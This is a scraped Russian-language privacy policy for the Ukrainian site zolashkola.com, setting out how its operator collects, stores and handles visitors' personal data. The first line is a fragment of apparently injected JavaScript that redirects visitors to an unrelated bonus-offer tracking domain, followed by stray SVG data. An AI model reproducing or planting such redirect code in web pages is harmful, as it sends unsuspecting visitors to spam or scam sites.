{ window.location.replace('http://cabonusoffer.com/track/'); }, delay);})();-0.59-0.87-1.33-0.87-2.22c0-0.82,0.3-1.54,0.89-2.15s1.33-0.91,2.22-0.91h8.13 c0.7,0,1.33-0.26,1.87-0.78c0.55-0.52,0.82-1.14,0.82-1.87c0-0.76-0.27-1.39-0.8-1.9c-0.53-0.5-1.15-0.77-1.85-0.8h-3.15 c-1.16-0.03-2.27-0.27-3.34-0.73c-1.07-0.46-2-1.07-2.81-1.85c-0.81-0.78-1.46-1.7-1.94-2.76c-0.49-1.07-0.73-2.22-0.73-3.47 c0-1.13,0.23-2.22,0.69-3.29c0.46-1.07,1.09-2.01,1.9-2.83c0.81-0.82,1.74-1.48,2.81-1.99c1.07-0.5,2.21-0.75,3.43-0.75h8.13 c0.82,0,1.52,0.3,2.1,0.89c0.58,0.59,0.9,1.33,0.96,2.22c0,0.88-0.29,1.62-0.87,2.19c-0.58,0.58-1.31,0.87-2.19,0.87h-8.13 C66.03,61.93,65.42,62.2,64.91,62.73z"/>
Пн-Пт з 9:00 до 18:00
Сб-Нд вихідний
RU

Политика конфиденциальности

Политика по обработке персональных данных
1. Общие положения
Настоящая политика обработки персональных данных составлена в соответствии с требованиями ЗАКОНА УКРАИНЫ "О защите персональных данных" от 1 июня 2010г. № 2297-VI (далее - Закон о защите персональных данных) и определяет порядок обработки персональных данных и меры по обеспечению безопасности персональных данных, которые принимает Золоташко Наталья Николаевна (далее - Оператор).
1.1. Оператор ставит своей важнейшей целью и условием осуществления своей деятельности соблюдение прав и свобод человека и гражданина при обработке его персональных данных, включая защиту прав на неприкосновенность частной жизни, личную и семейную тайну.
1.2. Эта политика Оператора по обработке персональных данных (далее – Политика) применима ко всей информации, которую Оператор может получить о посетителях веб-сайта https://zolashkola.com/ .
2. Основные понятия, используемые в Политике
2.1. Автоматизированная обработка персональных данных – обработка персональных данных посредством средств вычислительной техники.
2.2. Блокировка персональных данных – временное прекращение обработки персональных данных (кроме случаев, если обработка необходима для уточнения персональных данных).
2.3. Веб-сайт – совокупность графических и информационных материалов, а также программ для ЭВМ и баз данных, обеспечивающих их доступность в сети Интернет по сетевому адресу https://zolashkola.com/.
2.4. Информационная система персональных данных – совокупность персональных данных, содержащихся в базах данных, и обеспечивающих их обработку информационных технологий и технических средств.
2.5. Обезличивание персональных данных — действия, при которых невозможно определить без использования дополнительной информации принадлежность персональных данных конкретному Пользователю или другому персональному персоналу.
2.6. Обработка персональных данных – любое действие (операция) или совокупность действий (операций), совершаемых с использованием средств автоматизации или без использования таких средств с персональными данными, включая сбор, запись, систематизацию, накопление, хранение, уточнение (обновление, изменение) , извлечение, использование, передачу (распространение, предоставление, доступ), обезличивание, блокирование, удаление, уничтожение персональных данных
2.7. Оператор – государственный орган, муниципальный орган, юридическое или физическое лицо, самостоятельно или совместно с другими лицами организующие и (или) осуществляющие обработку персональных данных, а также определяющие цели обработки персональных данных, состав подлежащих обработке персональных данных, действия (операции) , осуществляемые с персональными данными.
2.8. Персональные данные – любая информация, относящаяся прямо или косвенно к определенному или определенному Пользователю веб-сайту https://zolashkola.com/ .
2.9. Персональные данные, разрешенные субъектом персональных данных для распространения, - персональные данные, доступ неограниченного круга лиц к которым предоставлен субъектом персональных данных путем предоставления согласия на обработку персональных данных, разрешенных субъектом персональных данных для распространения в порядке, предусмотренном Законом о защита персональных данных (далее – персональные данные, разрешенные распространения).
2.10. Пользователь – любой посетитель веб-сайта https://zolashkola.com/.
2.11. Предоставление персональных данных – действия, направленные на раскрытие персональных данных определенному лицу или определенному кругу лиц.
2.12. Распространение персональных данных – любые действия, направленные на раскрытие персональных данных неопределенному кругу лиц (передача персональных данных) или на ознакомление с персональными данными неограниченного круга лиц, в том числе обнародование персональных данных в средствах массовой информации, размещение в информационно-телекоммуникационных сетях или предоставление доступа к персональным данным любым другим способом.
2.13. Трансграничная передача персональных данных – передача персональных данных на территорию иностранного государства в орган власти иностранного государства, иностранного физического или иностранного юридического лица.
2.14. Уничтожение персональных данных – любые действия, в результате которых персональные данные уничтожаются безвозвратно с невозможностью дальнейшего восстановления содержания персональных данных в информационной системе персональных данных и (или) уничтожаются материальные носители персональных данных.
3. Основные права и обязанности Оператора
3.1. Оператор имеет право:
– получать от субъекта персональных данных достоверную информацию и/или документы, содержащие персональные данные;
– в случае отзыва субъектом персональных данных согласия на обработку персональных данных Оператор имеет право продлить обработку персональных данных без согласия субъекта персональных данных при наличии оснований, указанных в Законе о защите персональных данных;
– самостоятельно определять состав и перечень мер, необходимых и достаточных для обеспечения исполнения обязанностей, предусмотренных Законом о защите персональных данных и принятыми в соответствии с ним нормативными правовыми актами, если иное не предусмотрено Законом о защите персональных данных или другими законами.
3.2. Оператор обязан:
– предоставлять субъекту персональные дных по его просьбе информацию, касающуюся обработки его персональных данных;
– организовывать обработку персональных данных в порядке, установленном действующим законодательством Украины.
– отвечать на обращения и запросы субъектов персональных данных и их законных представителей в соответствии с требованиями Закона о защите персональных данных;
– сообщать в уполномоченный орган защиты прав субъектов персональных данных по запросу этого органа необходимую информацию в течение 30 дней с даты получения такого запроса;
– публиковать или иным образом обеспечивать неограниченный доступ к настоящей Политике по обработке персональных данных;
– принимать правовые, организационные и технические меры для защиты персональных данных от неправомерного или случайного доступа к ним, уничтожения, изменения, блокировки, копирования, предоставления, распространения персональных данных, а также от других неправомерных действий по персональным данным;
– прекратить передачу (распространение, предоставление, доступ) персональных данных, прекратить обработку и уничтожить персональные данные в порядке и случаях, предусмотренных Законом о защите персональных данных;
- выполнять другие обязанности, предусмотренные Законом о защите персональных данных.
4. Основные права и обязанности субъектов персональных данных
4.1. Субъекты персональных данных имеют право:
– получать информацию об обработке его персональных данных, за исключением случаев, предусмотренных законами. Информация предоставляется субъекту персональных данных Оператором в доступной форме, и в них не должны содержаться персональные данные, принадлежащие другим субъектам персональных данных, за исключением случаев, когда есть законные основания для раскрытия таких персональных данных. Перечень информации и порядок ее получения установлены Законом о защите персональных данных;
– требовать от оператора уточнения его персональных данных, их блокировки или уничтожения в случае, если персональные данные являются неполными, устаревшими, неточными, незаконно полученными или не необходимы для заявленной цели обработки, а также принимать предусмотренные законом меры по защите своих прав;
- выдвигать условие предварительного согласия при обработке персональных данных с целью продвижения на рынке товаров, работ и услуг;
- в отзыв согласия на обработку персональных данных;
– обжаловать в уполномоченный орган защиты прав субъектов персональных данных или в судебном порядке неправомерные действия или бездействие Оператора при обработке его персональных данных;
– на проведение других прав, предусмотренных законодательством Украины.
4.2. Субъекты персональных данных обязаны:
- предоставлять Оператору достоверные сведения о себе;
– сообщать Оператору об уточнении (обновлении, изменении) своих персональных данных.
4.3. Лица, передавшие Оператору недостоверные сведения о себе или сведения о другом субъекте персональных данных без согласия последней, отвечают в соответствии с законодательством Украины.
5. Оператор может обрабатывать следующие персональные данные Пользователя
5.1. Электронный адрес.
5.2. Номера телефонов.
5.3. Имя
5.4. Ник (имя) в Instagram.
5.4. Также на сайте производится сбор и обработка обезличенных данных о посетителях (в т.ч. файлов cookie) с помощью сервисов интернет-статистики (Гугл Аналитика и других).
5.5. Политики объединены общим понятием Персональные данные.
5.6. Обработка специальных категорий персональных данных, касающихся расовой, национальной принадлежности, политических взглядов, религиозных или философских убеждений интимной жизни Оператором не осуществляется.
5.7. Обработка персональных данных, разрешенных для распространения, из специальных категорий персональных данных, указанных в Законе о персональных данных, допускается, если соблюдаются запреты и условия, предусмотренные другими пунктами Закона о защите персональных данных.
5.8. Согласие пользователя на обработку персональных данных, разрешенных для распространения, оформляется отдельно от других согласий на обработку персональных данных. При этом соблюдаются условия, предусмотренные, в частности, Законом о защите персональных данных. Требования к содержанию такого согласия устанавливаются уполномоченным органом защиты прав субъектов персональных данных.
5.8.1. Согласие на обработку персональных данных, разрешенных для распространения, Пользователь предоставляет Оператору напрямую.
5.8.2 Оператор обязан в срок не позднее трех рабочих дней с момента получения указанного согласия Пользователя опубликовать информацию об условиях обработки, наличии запретов и условиях на обработку неограниченным кругом лиц персональных данных, разрешенных для распространения.
5.8.3 Передача (распространение, предоставление, доступ) персональных данных, разрешенных субъектом персональных данных для распространения, должна быть прекращена в любое время по требованию субъекта персональных данных. Это требование должно включать в себя имя, контактную информацию (номер телефона, адрес электронной почты) субъекта персональных данных, а также перечень персональных данных, обработка которых подлежит прекращению. Указанные по этому требованию персональные данные могут обрабатываться только Оператором, которому она направлена.
5.8.4. Согласие на обработку персональных данных, дозсвободных для распространения, прекращает свое действие с момента поступления к Оператору требования, указанного в п. 5.8.3 настоящей Политики по обработке персональных данных.
6. Принципы обработки персональных данных
6.1. Обработка персональных данных производится на законной и справедливой основе.
6.2. Обработка персональных данных ограничивается достижением конкретных, предопределенных и законных целей. Не допускается обработка персональных данных, несовместимая с целью сбора персональных данных.
6.3. Не допускается объединение баз данных, содержащих персональные данные, обработка которых производится в целях, несовместимых между собой.
6.4. Обработке подлежат только персональные данные, отвечающие целям их обработки.
6.5. Содержание и объем обрабатываемых персональных данных соответствуют заявленным целям обработки. Не допускается избыточность обрабатываемых персональных данных по заявленным целям их обработки.
6.6. При обработке персональных данных обеспечивается точность персональных данных, их достаточность, а в необходимых случаях и актуальность по отношению к целям обработки персональных данных. Оператор принимает необходимые меры и/или обеспечивает их принятие по удалению или уточнению неполных или неточных данных.
6.7. Хранение персональных данных осуществляется в форме, позволяющей определить субъекта персональных данных, не дольше этого требуют цели обработки персональных данных, если срок хранения персональных данных не установлен законом, договором, стороной которого, выгодоприобретателем или поручителем по которому является субъект персональных данных Обрабатываемые персональные данные уничтожаются или обезличиваются после достижения целей обработки или в случае утраты необходимости достижения этих целей, если иное не предусмотрено законом.
7. Цели обработки персональных данных
7.1. Цель обработки персональных данных Пользователя:
– информирование Пользователя посредством отправки электронных писем;
– предоставление доступа Пользователю к сервисам, информации и/или материалам, содержащимся на веб-сайте https://zolashkola.com/.
7.2. Также Оператор имеет право отправлять Пользователю уведомления о новых продуктах и услугах, специальных предложениях и различных событиях. Пользователь всегда может отказаться от получения информационных сообщений, отправив Оператору письмо по электронной почте info@zolashkola.com с пометкой «Отказ от сообщений о новых продуктах и услугах и специальных предложениях».
7.3. Обезличенные данные пользователей, которые собираются с помощью сервисов интернет-статистики, служат для сбора информации о действиях пользователей на сайте, улучшения качества сайта и его содержания.
8. Правовые основы обработки персональных данных
8.1. Правовыми основаниями обработки персональных данных Оператором являются:
– З А К О Н У К Р А И Н И О защите персональных данных от 1 июня 2010г. №2297-VI С изменениями и дополнениями, внесенными Законами Украины от 23 февраля 2012 года №4452-VI, от 20 ноября 2012 года №5491-VI;
- законы, другие нормативно-правовые акты в сфере защиты персональных данных;
– согласия пользователей на обработку их персональных данных, на обработку персональных данных, разрешенных для распространения.
8.2. Оператор обрабатывает персональные данные Пользователя только в случае их заполнения и/или отправки Пользователем самостоятельно через специальные формы, размещенные на сайте https://zolashkola.com/ или отправленные Оператору с помощью электронной почты. Заполняя соответствующие формы и/или посылая свои персональные данные Оператору, Пользователь выражает свое согласие с настоящей Политикой.
8.3. Оператор обрабатывает обезличенные данные о Пользователе в случае, если это разрешено в настройках браузера Пользователя (включено сохранение файлов cookie и использование технологии JavaScript).
8.4. Субъект персональных данных самостоятельно принимает решение о предоставлении его персональных данных и дает согласие свободно своей волей и в своем интересе.
9. Условия обработки персональных данных
9.1. Обработка персональных данных производится с согласия субъекта персональных данных на обработку его персональных данных.
9.2. Обработка персональных данных необходима для достижения целей, предусмотренных международным договором или законом, для осуществления возложенных законодательством Украины на оператора функций, полномочий и обязанностей.
9.3. Обработка персональных данных необходима для осуществления правосудия, исполнения судебного акта, акта другого органа или должностного лица, подлежащих исполнению в соответствии с законодательством Украины об исполнительном производстве.
9.4. Обработка персональных данных необходима для выполнения договора, стороной которого либо выгодоприобретателем или поручителем, по которому является субъект персональных данных, а также для заключения договора по инициативе субъекта персональных данных или договора, по которому субъект персональных данных будет выгодоприобретателем или поручителем.
9.5. Обработка персональных данных необходима для осуществления прав и законных интересов оператора или третьих лиц или для достижения общественно значимых целей при условии, что при этом не нарушаются права и свободы субъекта персональных данных.
9.6. Осуществляется обработка персональных данных, доступ неограниченного круга особ к которым предоставлен субъектом персональных данных или по его просьбе (далее – общедоступные персональные данные).
9.7. Осуществляется обработка персональных данных, подлежащих опубликованию или обязательному раскрытию в соответствии с законом.
10. Порядок сбора, хранения, передачи и других видов обработки персональных данных
Безопасность персональных данных, обрабатываемых Оператором, обеспечивается путем реализации правовых, организационных и технических мер, необходимых для выполнения в полном объеме требований действующего законодательства в сфере защиты персональных данных.
10.1. Оператор обеспечивает сохранение персональных данных и принимает все возможные меры, исключающие доступ к персональным данным неуполномоченных лиц.
10.2. Персональные данные Пользователя никогда, ни в коем случае не будут переданы третьим лицам, за исключением случаев, связанных с исполнением действующего законодательства или в случае, если субъектом персональных данных предоставлено согласие Оператору на передачу данных третьему лицу для выполнения обязательств по граждански -правовым контрактом.
10.3. В случае обнаружения неточностей в персональных данных Пользователь может актуализировать их самостоятельно путем отправки Оператору сообщения на адрес электронной почты Оператора info@zolashkola.com с пометкой «Актуализация персональных данных».
10.4. Срок обработки персональных данных определяется достижением целей, для которых были собраны персональные данные, если иной срок не предусмотрен договором или действующим законодательством.
Пользователь может в любой момент отозвать свое согласие на обработку персональных данных, отправив Оператору сообщение с помощью электронной почты по электронному адресу Оператора info@zolashkola.com с пометкой «Отзыв согласия на обработку персональных данных».
10.5. Вся информация, собираемая сторонними сервисами, включая платежные системы, средства связи и другие поставщики услуг, хранится и обрабатывается указанными лицами (Операторами) в соответствии с их Соглашением пользователя и Политикой конфиденциальности. Субъект персональных данных и/или Пользователь обязан самостоятельно ознакомиться с указанными документами. Оператор не несет ответственности за действия третьих лиц, включая указанных в этом пункте поставщиков услуг.
10.6. Установленные субъектом персональных данных запреты на передачу (кроме предоставления доступа), а также на обработку или условия обработки (кроме получения доступа) персональных данных, разрешенных к распространению, не действуют в случаях обработки персональных данных в государственных, общественных и других публичных интересах, определенных законодательством Украины.
10.7. Оператор при обработке персональных данных обеспечивает конфиденциальность персональных данных.
10.8. Оператор осуществляет хранение персональных данных в форме, позволяющей определить субъекта персональных данных не дольше, чем этого требуют цели обработки персональных данных, если срок хранения персональных данных не установлен законом, договором, стороной которого, выгодоприобретателем или поручителем по которому является субъект персональных данных
10.9. Условием прекращения обработки персональных данных может быть достижение целей обработки персональных данных, окончание срока действия согласия субъекта персональных данных или отзыв согласия субъектом персональных данных, а также выявление неправомерной обработки персональных данных.
11. Перечень действий, производимых Оператором с полученными персональными данными
11.1. Оператор осуществляет сбор, запись, систематизацию, накопление, хранение, уточнение (обновление, изменение), изъятие, использование, передачу (распространение, предоставление, доступ), обезличивание, блокирование, удаление и уничтожение персональных данных.
11.2. Оператор осуществляет автоматизированную обработку персональных данных с получением и/или передачей полученной информации по информационно-телекоммуникационным сетям или без таковой.
12. Трансграничная передача персональных данных
12.1. Оператор до начала трансграничной передачи персональных данных обязан убедиться в том, что иностранным государством, территорию которого предполагается осуществлять передачу персональных данных, обеспечивается надежная защита прав субъектов персональных данных.
12.2. Трансграничная передача персональных данных на территории иностранных государств, не отвечающих вышеуказанным требованиям, может осуществляться только в случае наличия согласия в письменной форме субъекта персональных данных на трансграничную передачу его персональных данных и/или исполнения договора, стороной которого является субъект персональных данных .
13. Конфиденциальность персональных данных
Оператор и другие лица, получившие доступ к персональным данным, обязаны не раскрывать третьим лицам и не распространять персональные данные без согласия субъекта персональных данных, если иное не предусмотрено законом.
14. Заключительные положения
14.1. Пользователь может получить любые разъяснения по вопросам, касающимся обработки его персональных данных, обратившись к Оператору по электронной почте info@zolashkola.com.
14.2. В этом документе будут отображены изменения политики обработки персональных данных Оператором. Политика действует бессрочно до смены ее новой версией.